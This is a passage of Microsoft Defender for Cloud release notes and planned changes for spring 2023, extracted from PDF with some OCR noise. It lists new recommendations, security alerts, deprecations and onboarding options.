Control updates were made to the NIST 800-53 standards in regulatory compliance 


Planning of cloud migration with an Azure Migrate business case now includes Defender 


for Cloud 


Express configuration for vulnerability assessments in Defender for SQL is now Generally 
Available 


More scopes added to existing Azure DevOps Connectors 


Replacing agent-based discovery with agentless discovery for containers capabilities in 
Defender CSPM 


Streamlined multicloud account onboarding with 
enhanced settings 


June 26, 2023 


Defender for Cloud has improved the onboarding experience to include a new 
streamlined user interface and instructions in addition to new capabilities that allow you 
to onboard your AWS and GCP environments while providing access to advanced 


onboarding features. 


For organizations that have adopted Hashicorp Terraform for automation, Defender for 
Cloud now includes the ability to use Terraform as the deployment method alongside 
AWS CloudFormation or GCP Cloud Shell. You can now customize the required role 
names when creating the integration. You can also select between: 


e Default access - Allows Defender for Cloud to scan your resources and 
automatically include future capabilities. 


e Least privileged access -Grants Defender for Cloud access only to the current 
permissions needed for the selected plans. 


If you select the least privileged permissions, you'll only receive notifications on any new 
roles and permissions that are required to get full functionality on the connector health. 


Defender for Cloud allows you to distinguish between your cloud accounts by their 
native names from the cloud vendors. For example, AWS account aliases and GCP 


project names. 


Private Endpoint support for Malware Scanning in 
Defender for Storage 


June 25, 2023 


Private Endpoint support is now available as part of the Malware Scanning public 
preview in Defender for Storage. This capability allows enabling Malware Scanning on 
storage accounts that are using private endpoints. No other configuration is needed. 


Malware Scanning (Preview) in Defender for Storage helps protect your storage 
accounts from malicious content by performing a full malware scan on uploaded 
content in near real-time, using Microsoft Defender Antivirus capabilities. It's designed 
to help fulfill security and compliance requirements for handling untrusted content. It's 
an agentless SaaS solution that allows simple setup at scale, with zero maintenance, and 
supports automating response at scale. 


Private endpoints provide secure connectivity to your Azure Storage services, effectively 
eliminating public internet exposure, and are considered a security best practice. 


For storage accounts with private endpoints that have Malware Scanning already 
enabled, you'll need to disable and enable the plan with Malware Scanning for this to 


work. 


Learn more about using private endpoints in Defender for Storage and how to secure 
your storage services further. 


Recommendation released for preview: Running 
container images should have vulnerability findings 
resolved (powered by Microsoft Defender Vulnerability 
Management) 


June 21, 2023 


A new container recommendation in Defender CSPM powered by MDVM is released for 


preview: 
Recommendation Description Assessment 
Key 
Running container images Container image vulnerability assessment scans c609cfOf-71ab- 
should have vulnerability your registry for commonly known vulnerabilities 41e9-a3c6- 
findings resolved (powered (CVEs) and provides a detailed vulnerability 9a1f7fe1b8d5 
by Microsoft Defender report for each image. This recommendation 


Vulnerability Management) provides visibility to vulnerable images currently 

(Preview) running in your Kubernetes clusters. Remediating 
vulnerabilities in container images that are 
currently running is key to improving your 
security posture, significantly reducing the attack 
surface for your containerized workloads. 


This new recommendation replaces the current recommendation of the same name, 
powered by Qualys, only in Defender CSPM (replacing assessment key 41503391-efa5- 
47ee-9282-4eff6131462c). 


Control updates were made to the NIST 800-53 standards 
in regulatory compliance 


June 15, 2023 


The NIST 800-53 standards (both R4 and R5) have recently been updated with control 
changes in Microsoft Defender for Cloud regulatory compliance. The Microsoft- 
managed controls have been removed from the standard, and the information on the 
Microsoft responsibility implementation (as part of the cloud shared responsibility 
model) is now available only in the control details pane under Microsoft Actions. 


These controls were previously calculated as passed controls, so you may see a 
significant dip in your compliance score for NIST standards between April 2023 and May 
2023. 


For more information on compliance controls, see Tutorial: Regulatory compliance 
checks - Microsoft Defender for Cloud. 


Planning of cloud migration with an Azure Migrate 
business case now includes Defender for Cloud 


June 11, 2023 


Now you can discover potential cost savings in security by applying Defender for Cloud 
within the context of an Azure Migrate business case. 


Express configuration for vulnerability assessments in 
Defender for SQL is now Generally Available 


June 7, 2023 


Express configuration for vulnerability assessments in Defender for SQL is now Generally 
Available. Express configuration provides a streamlined onboarding experience for SQL 
vulnerability assessments by using a one-click configuration (or an API call). There's no 
extra settings or dependencies on managed storage accounts needed. 


Check out this blog £ to learn more about express configuration. 


You can learn the differences between express and classic configuration. 


More scopes added to existing Azure DevOps Connectors 
June 6, 2023 


Defender for DevOps added the following extra scopes to the Azure DevOps (ADO) 
application: 


e Advance Security management: vso.advsec_manage . Which is needed in order to 


allow you to enable, disable and manage GitHub Advanced Security for ADO. 


e Container Mapping: vso.extension_manage, vso.gallery_manager ; Which is needed 


in order to allow you to share the decorator extension with the ADO organization. 


Only new Defender for DevOps customers that are trying to onboard ADO resources to 
Microsoft Defender for Cloud are affected by this change. 


Onboarding directly (without Azure Arc) to Defender for 
Servers is now Generally Available 


June 5, 2023 


Previously, Azure Arc was required to onboard non-Azure servers to Defender for 
Servers. However, with the latest release you can also onboard your on-premises servers 
to Defender for Servers using only the Microsoft Defender for Endpoint agent. 


This new method simplifies the onboarding process for customers focused on core 
endpoint protection and allows you to take advantage of Defender for Servers’ 
consumption-based billing for both cloud and noncloud assets. The direct onboarding 
option via Defender for Endpoint is available now, with billing for onboarded machines 
starting on July 1. 


For more information, see Connect your non-Azure machines to Microsoft Defender for 


Cloud with Defender for Endpoint. 


Replacing agent-based discovery with agentless 
discovery for containers capabilities in Defender CSPM 


June 4, 2023 


With Agentless Container Posture capabilities available in Defender CSPM, the agent- 
based discovery capabilities are now retired. If you currently use container capabilities 
within Defender CSPM, please make sure that the relevant extensions are enabled to 
continue receiving container-related value of the new agentless capabilities such as 
container-related attack paths, insights, and inventory. (It can take up to 24 hours to see 
the effects of enabling the extensions). 


Learn more about agentless container posture. 


May 2023 


Updates in May include: 


e New alert in Defender for Key Vault 
e Agentless scanning now supports encrypted disks in AWS 
e Revised JIT (Just-In-Time) rule naming conventions in Defender for Cloud 


e Onboard selected AWS regions 

e Multiple changes to identity recommendations 

e Deprecation of legacy standards in compliance dashboard 

e Two Defender for DevOps recommendations now include Azure DevOps scan 
findings 

e New default setting for Defender for Servers vulnerability assessment solution 

e Download a CSV report of your cloud security explorer query results (Preview) 

e Release of containers Vulnerability Assessment powered by Microsoft Defender 
Vulnerability Management (MDVM) in Defender CSPM 

e Renaming container recommendations powered by Qualys 

e Defender for DevOps GitHub Application update 

e Defender for DevOps Pull Request annotations in Azure DevOps repositories now 
includes Infrastructure as Code misconfigurations 


New alert in Defender for Key Vault 


Alert (alert type) Description MITRE Severity 
tactics 

Unusual access to the key vault A user or service principal has Credential Medium 

from a suspicious IP (Non- attempted anomalous access to Access 

Microsoft or External) key vaults from a non-Microsoft IP 

(KV_UnusualAccessSuspicious|P) in the last 24 hours. This 


anomalous access pattern may be 
legitimate activity. It could be an 
indication of a possible attempt to 
gain access of the key vault and 
the secrets contained within it. We 
recommend further investigations. 


For all of the available alerts, see Alerts for Azure Key Vault. 


Agentless scanning now supports encrypted disks in AWS 


Agentless scanning for VMs now supports processing of instances with encrypted disks 
in AWS, using both CMK and PMK. 


This extended support increases coverage and visibility over your cloud estate without 
impacting your running workloads. Support for encrypted disks maintains the same zero 
impact method on running instances. 


e For new customers enabling agentless scanning in AWS - encrypted disks coverage 
is built in and supported by default. 


e For existing customers that already have an AWS connector with agentless 
scanning enabled, you need to reapply the CloudFormation stack to your 
onboarded AWS accounts to update and add the new permissions that are 
required to process encrypted disks. The updated CloudFormation template 
includes new assignments that allow Defender for Cloud to process encrypted 
disks. 


You can learn more about the permissions used to scan AWS instances. 
To re-apply your CloudFormation stack: 


1. Go to Defender for Cloud environment settings and open your AWS connector. 
2. Navigate to the Configure Access tab. 

3. Select Click to download the CloudFormation template. 

4. Navigate to your AWS environment and apply the updated template. 


Learn more about agentless scanning and enabling agentless scanning in AWS. 


Revised JIT (Just-In-Time) rule naming conventions in 
Defender for Cloud 


We revised the JIT (Just-In-Time) rules to align with the Microsoft Defender for Cloud 
brand. We changed the naming conventions for Azure Firewall and NSG (Network 
Security Group) rules. 


The changes are listed as follows: 


Description Old Name New Name 

JIT rule names (allow and deny) in SecurityCenter- MicrosoftDefenderForCloud- 

NSG (Network Security Group) JITRule JITRule 

JIT rule descriptions in NSG ASC JIT Network MDC JIT Network Access rule 
Access rule 

JIT firewall rule collection names ASC-JIT MDC-JIT 

JIT firewall rules names ASC-JIT MDC-JIT 


Learn how to secure your management ports with Just-In-Time access. 


Onboard selected AWS regions 


To help you manage your AWS CloudtTrail costs and compliance needs, you can now 
select which AWS regions to scan when you add or edit a cloud connector. You can now 


scan selected specific AWS regions or all available regions (default), when you onboard 
your AWS accounts to Defender for Cloud. Learn more at Connect your AWS account to 
Microsoft Defender for Cloud. 


Multiple changes to identity recommendations 


The following recommendations are now released as General Availability (GA) and are 
replacing the V1 recommendations that are now deprecated. 


General Availability (GA) release of identity recommendations V2 
The V2 release of identity recommendations introduces the following enhancements: 


e The scope of the scan has been expanded to include all Azure resources, not just 
subscriptions. Which enables security administrators to view role assignments per 
account. 


e Specific accounts can now be exempted from evaluation. Accounts such as break 


glass or service accounts can be excluded by security administrators. 


e The scan frequency has been increased from 24 hours to 12 hours, thereby 


ensuring that the identity recommendations are more up-to-date and accurate. 


The following security recommendations are available in GA and replace the V1 


recommendations: 


Recommendation 


Accounts with owner permissions on Azure resources should 
be MFA enabled 


Accounts with write permissions on Azure resources should be 
MFA enabled 


Accounts with read permissions on Azure resources should be 
MFA enabled 


Guest accounts with owner permissions on Azure resources 
should be removed 


Guest accounts with write permissions on Azure resources 
should be removed 


Guest accounts with read permissions on Azure resources 
should be removed 


Blocked accounts with owner permissions on Azure resources 
should be removed 


Assessment Key 


6240402e-f77c-46fa-9060- 
a/7ce53997754 


cOcb17b2-0607-48a7-b0e0- 
903ed22de39b 


dabc9bc4-b8a8-45bd-9a5a- 
43000df8aa1c 


20606e75-05c4-48c0-9d97- 
add6daa2109a 


0354476c-a12a-4fcc-a79d- 
f0ab/7ffffdbb 


fde1c0c9-0fd2-4ecc-87b5- 
98956cbc1095 


050ac097-3dda-4d24-ab6d- 
82568e7a50cf 


Recommendation 


Blocked accounts with read and write permissions on Azure 
resources should be removed 


Assessment Key 


1ff0b4c9-ed56-4de6-be9c- 
d7ab39645926 


Deprecation of identity recommendations V1 


The following security recommendations are now deprecated: 


Recommendation 


MFA should be enabled on accounts with owner permissions 
on subscriptions 


MFA should be enabled on accounts with write permissions 
on subscriptions 


MFA should be enabled on accounts with read permissions on 
subscriptions 


External accounts with owner permissions should be removed 
from subscriptions 


External accounts with write permissions should be removed 
from subscriptions 


External accounts with read permissions should be removed 
from subscriptions 


Deprecated accounts with owner permissions should be 
removed from subscriptions 


Deprecated accounts should be removed from subscriptions 


Assessment Key 


94290b00-4d0c-d7b4-7cea- 
064a9554e681 


57e98606-6b1e-6193-0e3d- 
fe621387c16b 


151e82c5-5341-a74b-1eb0- 
bc38d2c84bb5 


c3b6ae71-f1f0-31b4-e6c1- 
d5951285d03d 


04e7147b-Odeb-9796-2e5c- 
0336343ceb3d 


a8c6a4ad-d51e-88fe-2979- 
d3ee3c864f8b 


e52064aa-6853-e252-a1 1e- 
dffc675689c2 


00c6d40b-e990-6acf-d4f3- 
471e747a27c4 


We recommend updating your custom scripts, workflows, and governance rules to 
correspond with the V2 recommendations. 


Deprecation of legacy standards in compliance 
dashboard 


Legacy PCI DSS v3.2.1 and legacy SOC TSP have been fully deprecated in the Defender 
for Cloud compliance dashboard, and replaced by SOC 2 Type 2 initiative and PCI DSS 

v4 initiative-based compliance standards. We have fully deprecated support of PCI DSS 
standard/initiative in Microsoft Azure operated by 21Vianet. 


Learn how to customize the set of standards in your regulatory compliance dashboard. 


Two Defender for DevOps recommendations now include 
Azure DevOps scan findings 


Defender for DevOps Code and laC has expanded its recommendation coverage in 
Microsoft Defender for Cloud to include Azure DevOps security findings for the 


following two recommendations: 
e Code repositories should have code scanning findings resolved 


e Code repositories should have infrastructure as code scanning findings 


resolved 


Previously, coverage for Azure DevOps security scanning only included the secrets 


recommendation. 


Learn more about Defender for DevOps. 


New default setting for Defender for Servers vulnerability 
assessment solution 


Vulnerability assessment (VA) solutions are essential to safeguard machines from 
cyberattacks and data breaches. 


Microsoft Defender Vulnerability Management (MDVM) is now enabled as the default, 
built-in solution for all subscriptions protected by Defender for Servers that don't 
already have a VA solution selected. 


If a subscription has a VA solution enabled on any of its VMs, no changes are made and 
MDVM won't be enabled by default on the remaining VMs in that subscription. You can 
choose to enable a VA solution on the remaining VMs on your subscriptions. 


Learn how to Find vulnerabilities and collect software inventory with agentless scanning 


(Preview). 
Download a CSV report of your cloud security explorer 


query results (Preview) 


Defender for Cloud has added the ability to download a CSV report of your cloud 
security explorer query results. 


After your run a search for a query, you can select the Download CSV report (Preview) 
button from the Cloud Security Explorer page in Defender for Cloud. 


Learn how to build queries with cloud security explorer 


Release of containers Vulnerability Assessment powered 
by Microsoft Defender Vulnerability Management 
(MDVM) in Defender CSPM 


We're announcing the release of Vulnerability Assessment for Linux images in Azure 
container registries powered by Microsoft Defender Vulnerability Management (MDVM) 
in Defender CSPM. This release includes daily scanning of images. Findings used in the 
Security Explorer and attack paths rely on MDVM Vulnerability Assessment instead of 


the Qualys scanner. 

The existing recommendation Container registry images should have vulnerability 

findings resolved is replaced by a new recommendation powered by MDVM: 
Recommendation Description Assessment Key 


Container registry images Container image vulnerability assessment scans dbd0cb49-b563- 
should have vulnerability your registry for commonly known vulnerabilities 45e7-9724- 


findings resolved (CVEs) and provides a detailed vulnerability 889e799fa648 
(powered by Microsoft report for each image. This recommendation is replaced by 
Defender Vulnerability provides visibility to vulnerable images currently | cOb7cfc6-3172- 
Management) running in your Kubernetes clusters. Remediating 465a-b378- 
vulnerabilities in container images that are 53c7ff2cc0d5 


currently running is key to improving your 
security posture, significantly reducing the attack 
surface for your containerized workloads. 


Learn more about Agentless Containers Posture in Defender CSPM. 


Learn more about Microsoft Defender Vulnerability Management (MDVM). 


Renaming container recommendations powered by 
Qualys 


The current container recommendations in Defender for Containers will be renamed as 
follows: 


Recommendation Description Assessment Key 


Container registry images Container image vulnerability assessment scans dbdO0cb49-b563- 


should have vulnerability your registry for security vulnerabilities and 45e7-9724- 
findings resolved (powered exposes detailed findings for each image. 889e799fa648 
by Qualys) Resolving the vulnerabilities can greatly 


improve your containers’ security posture and 
protect them from attacks. 


Running container images Container image vulnerability assessment scans 41503391-efa5- 


should have vulnerability container images running on your Kubernetes A7ee-9282- 
findings resolved (powered clusters for security vulnerabilities and exposes 4eff6131462c 
by Qualys) detailed findings for each image. Resolving the 


vulnerabilities can greatly improve your 
containers’ security posture and protect them 
from attacks. 


Defender for DevOps GitHub Application update 


Microsoft Defender for DevOps is constantly making changes and updates that require 
Defender for DevOps customers who have onboarded their GitHub environments in 
Defender for Cloud to provide permissions as part of the application deployed in their 
GitHub organization. These permissions are necessary to ensure all of the security 
features of Defender for DevOps operate normally and without issues. 


We suggest updating the permissions as soon as possible to ensure continued access to 
all available features of Defender for DevOps. 


Permissions can be granted in two different ways: 


e In your organization, select GitHub Apps. Locate Your organization, and select 
Review request. 


e You'll get an automated email from GitHub Support. In the email, select Review 
permission request to accept or reject this change. 


After you have followed either of these options, you'll be navigated to the review screen 
where you should review the request. Select Accept new permissions to approve the 
request. 


If you require any assistance updating permissions, you can create an Azure support 
request. 


You can also learn more about Defender for DevOps. If a subscription has a VA solution 
enabled on any of its VMs, no changes are made and MDVM won't be enabled by 


default on the remaining VMs in that subscription. You can choose to enable a VA 


solution on the remaining VMs on your subscriptions. 


Learn how to Find vulnerabilities and collect software inventory with agentless scanning 
(Preview). 


Defender for DevOps Pull Request annotations in Azure 
DevOps repositories now includes Infrastructure as Code 
misconfigurations 


Defender for DevOps has expanded its Pull Request (PR) annotation coverage in Azure 
DevOps to include Infrastructure as Code (laC) misconfigurations that are detected in 
Azure Resource Manager and Bicep templates. 


Developers can now see annotations for laC misconfigurations directly in their PRs. 
Developers can also remediate critical security issues before the infrastructure is 
provisioned into cloud workloads. To simplify remediation, developers are provided with 
a severity level, misconfiguration description, and remediation instructions within each 
annotation. 


Previously, coverage for Defender for DevOps PR annotations in Azure DevOps only 
included secrets. 


Learn more about Defender for DevOps and Pull Request annotations. 


April 2023 


Updates in April include: 


e Agentless Container Posture in Defender CSPM (Preview) 

e New preview Unified Disk Encryption recommendation 

e Changes in the recommendation Machines should be configured securely 

e Deprecation of App Service language monitoring policies 

e New alert in Defender for Resource Manager 

e Three alerts in the Defender for Resource Manager plan have been deprecated 

e Alerts automatic export to Log Analytics workspace have been deprecated 

e Deprecation and improvement of selected alerts for Windows and Linux Servers 

e New Azure Active Directory authentication-related recommendations for Azure 
Data Services 

e Two recommendations related to missing Operating System (OS) updates were 
released to GA 

e Defender for APIs (Preview) 


Agentless Container Posture in Defender CSPM (Preview) 


The new Agentless Container Posture (Preview) capabilities are available as part of the 
Defender CSPM (Cloud Security Posture Management) plan. 


Agentless Container Posture allows security teams to identify security risks in containers 
and Kubernetes realms. An agentless approach allows security teams to gain visibility 
into their Kubernetes and containers registries across SDLC and runtime, removing 
friction and footprint from the workloads. 


Agentless Container Posture offers container vulnerability assessments that, combined 
with attack path analysis, enable security teams to prioritize and zoom into specific 
container vulnerabilities. You can also use cloud security explorer to uncover risks and 
hunt for container posture insights, such as discovery of applications running vulnerable 
images or exposed to the internet. 


Learn more at Agentless Container Posture (Preview). 


Unified Disk Encryption recommendation (preview) 


We have introduced a unified disk encryption recommendation in public preview, 


Windows virtual machines should enable Azure Disk Encryption or EncryptionAtHost 


and Linux virtual machines should enable Azure Disk Encryption or EncryptionAtHost. 


These recommendations replace Virtual machines should encrypt temp disks, caches, 
and data flows between Compute and Storage resources, which detected Azure Disk 
Encryption and the policy Virtual machines and virtual machine scale sets should 
have encryption at host enabled, which detected EncryptionAtHost. ADE and 
EncryptionAtHost provide comparable encryption at rest coverage, and we recommend 
enabling one of them on every virtual machine. The new recommendations detect 
whether either ADE or EncryptionAtHost are enabled and only warn if neither are 
enabled. We also warn if ADE is enabled on some, but not all disks of a VM (this 
condition isn't applicable to EncryptionAtHost). 


The new recommendations require Azure Automanage Machine Configuration Z . 
These recommendations are based on the following policies: 


e (Preview) Windows virtual machines should enable Azure Disk Encryption or 
EncryptionAtHost E 

e (Preview) Linux virtual machines should enable Azure Disk Encryption or 
EncryptionAtHost & 


Learn more about ADE and EncryptionAtHost and how to enable one of them. 


Changes in the recommendation Machines should be 
configured securely 


The recommendation Machines should be configured securely was updated. The 
update improves the performance and stability of the recommendation and aligns its 
experience with the generic behavior of Defender for Cloud's recommendations. 


As part of this update, the recommendation's ID was changed from 181ac480-£7c4-544b- 


9865-11b8ffe87F47 to c476dc48-8110-4139-91af-c8d940896b98 . 


No action is required on the customer side, and there's no expected effect on the secure 


score. 


Deprecation of App Service language monitoring policies 


The following App Service language monitoring policies have been deprecated due to 
their ability to generate false negatives and because they don't provide better security. 
You should always ensure you're using a language version without any known 
vulnerabilities. 


Policy name Policy ID 


App Service apps that use Java should use the latest Java 496223c3-ad65-4ecd-878a- 


version’ E bae78737e9ed 

App Service apps that use Python should use the latest 7008174a-fd10-4ef0-81 7e- 
‘Python version’ Z fc820a951d73 

Function apps that use Java should use the latest ‘Java 9d0b6ea4-93e2-4578-bf2f- 
version’ E 6bb17d22b4bc 

Function apps that use Python should use the latest 7238174a-fd10-4ef0-81 7e- 
‘Python version’ Z fc820a951d73 


App Service apps that use PHP should use the latest 'PHP 7261b6898-8a84-4db8-9e04- 
version’ E 18527132abb3 


Customers can use alternative built-in policies to monitor any specified language 
version for their App Services. 


These policies are no longer available in Defender for Cloud's built-in recommendations. 
You can add them as custom recommendations to have Defender for Cloud monitor 
them. 


New alert in Defender for Resource Manager 


Defender for Resource Manager has the following new alert: 


Alert (alert type) 


PREVIEW - Suspicious creation of 
compute resources detected 
(ARM_SuspiciousComputeCreation) 


Description MITRE 
tactics 
Microsoft Defender for Resource Impact 


Manager identified a suspicious 
creation of compute resources in 
your subscription utilizing Virtual 
Machines/Azure Scale Set. The 
identified operations are designed to 
allow administrators to efficiently 
manage their environments by 
deploying new resources when 
needed. While this activity may be 
legitimate, a threat actor might 
utilize such operations to conduct 
crypto mining. 

The activity is deemed suspicious as 
the compute resources scale is 
higher than previously observed in 
the subscription. 

This can indicate that the principal is 
compromised and is being used with 
malicious intent. 


You can see a list of all of the alerts available for Resource Manager. 


Severity 


Medium 


Three alerts in the Defender for Resource Manager plan 


have been deprecated 


The following three alerts for the Defender for Resource Manager plan have been 


deprecated: 


e Activity from a risky IP address (ARM.MCAS ActivityFromAnonymousIPAddresses) 


e Activity from infrequent country (ARM.MCAS ActivityFromInfrequentCountry ) 


e Impossible travel activity (ARM.MCAS ImpossibleTravelActivity) 


In a scenario where activity from a suspicious IP address is detected, one of the 
following Defenders for Resource Manager plan alerts Azure Resource Manager 


operation from suspicious IP address Or Azure Resource Manager operation from 


suspicious proxy IP address will be present. 


Alerts automatic export to Log Analytics workspace have 
been deprecated 


Defenders for Cloud security alerts are automatically exported to a default Log Analytics 
workspace on the resource level. This causes an indeterministic behavior and therefore 
we have deprecated this feature. 


Instead, you can export your security alerts to a dedicated Log Analytics workspace with 
Continuous Export. 


If you have already configured continuous export of your alerts to a Log Analytics 
workspace, no further action is required. 


Deprecation and improvement of selected alerts for 
Windows and Linux Servers 


The security alert quality improvement process for Defender for Servers includes the 
deprecation of some alerts for both Windows and Linux servers. The deprecated alerts 
are now sourced from and covered by Defender for Endpoint threat alerts. 


If you already have the Defender for Endpoint integration enabled, no further action is 
required. You may experience a decrease in your alerts volume in April 2023. 


If you don't have the Defender for Endpoint integration enabled in Defender for Servers, 
you'll need to enable the Defender for Endpoint integration to maintain and improve 
your alert coverage. 


All Defender for Servers customers, have full access to the Defender for Endpoint's 
integration as a part of the Defender for Servers plan. 


You can learn more about Microsoft Defender for Endpoint onboarding options. 
You can also view the full list of alerts that are set to be deprecated. 


Read the Microsoft Defender for Cloud blog”. 
New Azure Active Directory authentication-related 


recommendations for Azure Data Services 


We have added four new Azure Active Directory authentication-related 


recommendations for Azure Data Services. 


Recommendation Name 


Azure SQL Managed 
Instance authentication 
mode should be Azure 
Active Directory Only 


Azure Synapse Workspace 
authentication mode 
should be Azure Active 
Directory Only 


Azure Database for 
MySQL should have an 
Azure Active Directory 
administrator provisioned 


Azure Database for 
PostgreSQL should have 
an Azure Active Directory 
administrator provisioned 


Recommendation Description 


Disabling local authentication methods 
and allowing only Azure Active Directory 
Authentication improves security by 
ensuring that Azure SQL Managed 
Instances can exclusively be accessed by 
Azure Active Directory identities. 


Azure Active Directory only authentication 
methods improves security by ensuring 
that Synapse Workspaces exclusively 
require Azure AD identities for 
authentication. Learn more“. 


Provision an Azure AD administrator for 
your Azure Database for MySQL to enable 
Azure AD authentication. Azure AD 
authentication enables simplified 
permission management and centralized 
identity management of database users 
and other Microsoft services 


Provision an Azure AD administrator for 
your Azure Database for PostgreSQL to 
enable Azure AD authentication. Azure AD 
authentication enables simplified 
permission management and centralized 
identity management of database users 
and other Microsoft services 


Policy 


Azure SQL Managed 
Instance should have 
Azure Active Directory 
Only Authentication 
enabled Z 


Synapse Workspaces 
should use only Azure 
Active Directory 
identities for 
authentication č 


An Azure Active 
Directory administrator 
should be provisioned 
for MySQL servers 7 


An Azure Active 
Directory administrator 
should be provisioned 
for PostgreSQL servers E 


Two recommendations related to missing Operating 
System (OS) updates were released to GA 


The recommendations System updates should be installed on your machines (powered 


by Azure Update Manager) and Machines should be configured to periodically check 


for missing system updates have been released for General Availability. 


To use the new recommendation, you need to: 


e Connect your non-Azure machines to Arc. 


e Enable the periodic assessment property. You can use the Fix button. in the new 


recommendation, Machines should be configured to periodically check for 


missing system updates to fix the recommendation. 


After completing these steps, you can remove the old recommendation System updates 
should be installed on your machines, by disabling it from Defender for Cloud's built-in 


initiative in Azure policy. 
The two versions of the recommendations: 


e System updates should be installed on your machines E 
e System updates should be installed on your machines (powered by Azure Update 
Manager) “ 


will both be available until the Log Analytics agent is deprecated on August 31, 2024 7, 
which is when the older version (System updates should be installed on your machines) 
of the recommendation will be deprecated as well. Both recommendations return the 


same results and are available under the same control Apply system updates. 


The new recommendation System updates should be installed on your machines 
(powered by Azure Update Manager), has a remediation flow available through the Fix 


button, which can be used to remediate any results through the Update Manager 
(Preview). This remediation process is still in Preview. 


The new recommendation System updates should be installed on your machines 
(powered by Azure Update Manager), isn't expected to affect your Secure Score, as it has 
the same results as the old recommendation System updates should be installed on 


your machines. 


The prerequisite recommendation (Enable the periodic assessment property) has a 
negative effect on your Secure Score. You can remediate the negative effect with the 
available Fix button. 


Defender for APIs (Preview) 


Microsoft's Defender for Cloud is announcing the new Defender for APIs is available in 


preview. 


Defender for APIs offers full lifecycle protection, detection, and response coverage for 
APIs. 


Defender for APIs helps you to gain visibility into business-critical APIs. You can 
investigate and improve your API security posture, prioritize vulnerability fixes, and 
quickly detect active real-time threats. 


Learn more about Defender for APIs. 


Next steps 


For past changes to Defender for Cloud, see Archive for what's new in Defender for 
Cloud?. 


Important upcoming changes to 
Microsoft Defender for Cloud 


Article e 10/24/2023 


@ Important 


The information on this page relates to pre-release products or features, which 


might be substantially modified before they are commercially released, if ever. 


Microsoft makes no commitments or warranties, express or implied, with respect to 


the information provided here. 


On this page, you can learn about changes that are planned for Defender for Cloud. It 


describes planned modifications to the product that might affect things like your secure 


score or workflows. 


Q Tip 


Get notified when this page is updated by copying and pasting the following URL 


into your feed reader: 


https://aka.ms/mdc/upcoming-rss 


If you're looking for the latest release notes, you can find them in the What's new in 


Microsoft Defender for Cloud. 


Planned changes 


Planned change Announcement 
date 
Four alerts are set to be deprecated October 23, 2023 


Replacing the "Key Vaults should have purge protection 
enabled" recommendation with combined 
recommendation "Key Vaults should have deletion 
protection enabled" 


Preview alerts for DNS servers to be deprecated 


Estimated 
date for 
change 


November 23, 
2023 


June 2023 


August 2023 


Planned change Announcement 
date 


Classic connectors for multicloud will be retired 

Change to the Log Analytics daily cap 

DevOps Resource Deduplication for Defender for DevOps 
Changes to Attack Path's Azure Resource Graph table 
scheme 


Deprecating two security incidents 


Defender for Cloud plan and strategy for the Log Analytics 
agent deprecation 


Four alerts are set to be deprecated 


Announcement date: October 23, 2023 


Estimated date for change: November 23, 2023 


Estimated 
date for 
change 


September 
2023 


September 
2023 


November 
2023 


November 
2023 


November 
2023 


August 2024 


As part of our quality improvement process, the following security alerts are set to be 


deprecated: 


e Possible data exfiltration detected (K8S.NODE_DataEgressArtifacts) 


@ Executable found running from a suspicious location 
(K8S.NODE_SuspectExecutablePath) 
e Suspicious process termination burst (VM_TaskkillBurst) 


e PsExec execution detected (VM_RunByPsExec) 


Replacing the "Key Vaults should have purge 
protection enabled" recommendation with 
combined recommendation "Key Vaults should 


have deletion protection enabled" 


Estimated date for change: June 2023 


The Key Vaults should have purge protection enabled recommendation is deprecated 


from the (regulatory compliance dashboard/Azure security benchmark initiative) and 


replaced with a new combined recommendation Key Vaults should have deletion 


protection enabled. 


Recommendation Description 
name 


Key vaults should have A malicious insider in your organization can 

deletion protection potentially delete and purge key vaults. Purge 

enabled £ protection protects you from insider attacks by 
enforcing a mandatory retention period for soft 
deleted key vaults. No one inside your 
organization or Microsoft will be able to purge 
your key vaults during the soft delete retention 
period. 


Effect(s) 


audit, 
deny, 
disabled 


See the full index of Azure Policy built-in policy definitions for Key Vault 


Preview alerts for DNS servers to be 


deprecated 


Estimated date for change: August 2023 


Version 


2.0.04 


Following quality improvement process, security alerts for DNS servers are set to be 


deprecated in August. For cloud resources, use Azure DNS to receive the same security 


value. 


The following table lists the alerts to be deprecated: 


AlertDisplayName AlertType 
Communication with suspicious random domain name DNS_RandomizedDomain 
(Preview) 


Communication with suspicious domain identified by threat DNS_ThreatIntelSuspectDomain 


intelligence (Preview) 


Digital currency mining activity (Preview) DNS_CurrencyMining 


Network intrusion detection signature activation (Preview) DNS_SuspiciousDomain 


Attempted communication with suspicious sinkholed domain DNS _SinkholedDomain 


(Preview) 


Communication with possible phishing domain (Preview) DNS_PhishingDomain 


AlertDisplayName AlertType 


Possible data transfer via DNS tunnel (Preview) DNS_DataObfuscation 
Possible data exfiltration via DNS tunnel (Preview) DNS_DataExfiltration 
Communication with suspicious algorithmically generated DNS_DomainGenerationAlgorithm 


domain (Preview) 


Possible data download via DNS tunnel (Preview) DNS_Datalnfiltration 
Anonymity network activity (Preview) DNS_DarkWeb 
Anonymity network activity using web proxy (Preview) DNS_DarkWebProxy 


Classic connectors for multicloud will be retired 


Estimated date for change: September 15, 2023 


The classic multicloud connectors will be retiring on September 15, 2023 and no data 
will be streamed to them after this date. These classic connectors were used to connect 
AWS Security Hub and GCP Security Command Center recommendations to Defender 
for Cloud and onboard AWS EC2s to Defender for Servers. 


The full value of these connectors has been replaced with the native multicloud security 
connectors experience, which has been Generally Available for AWS and GCP since 
March 2022 at no additional cost. 


The new native connectors are included in your plan and offer an automated 
onboarding experience with options to onboard single accounts, multiple accounts (with 
Terraform), and organizational onboarding with auto provisioning for the following 
Defender plans: free foundational CSPM capabilities, Defender Cloud Security Posture 
Management (CSPM), Defender for Servers, Defender for SQL, and Defender for 
Containers. 


If you're currently using the classic multicloud connectors, we strongly recommend that 
you begin your migration to the native security connectors before September 15, 2023. 


How to migrate to the native security connectors: 


e Connect your AWS account to Defender for Cloud 
e Connect your GCP project to Defender for Cloud 


Change to the Log Analytics daily cap 


Azure monitor offers the capability to set a daily cap on the data that is ingested on 
your Log analytics workspaces. However, Defender for Cloud security events are 
currently not supported in those exclusions. 


Starting on September 18, 2023 the Log Analytics Daily Cap will no longer exclude the 
following set of data types: 


e WindowsEvent 

e SecurityAlert 

e SecurityBaseline 

e SecurityBaselineSummary 
e SecurityDetection 

e SecurityEvent 

e WindowsFirewall 

e Malicious|PCommunication 
e LinuxAuditLog 

e SysmonEvent 

e ProtectionStatus 

e Update 

e UpdateSummary 

e CommonSecurityLog 

e Syslog 


At that time, all billable data types will be capped if the daily cap is met. This change 
improves your ability to fully contain costs from higher-than-expected data ingestion. 


Learn more about workspaces with Microsoft Defender for Cloud. 


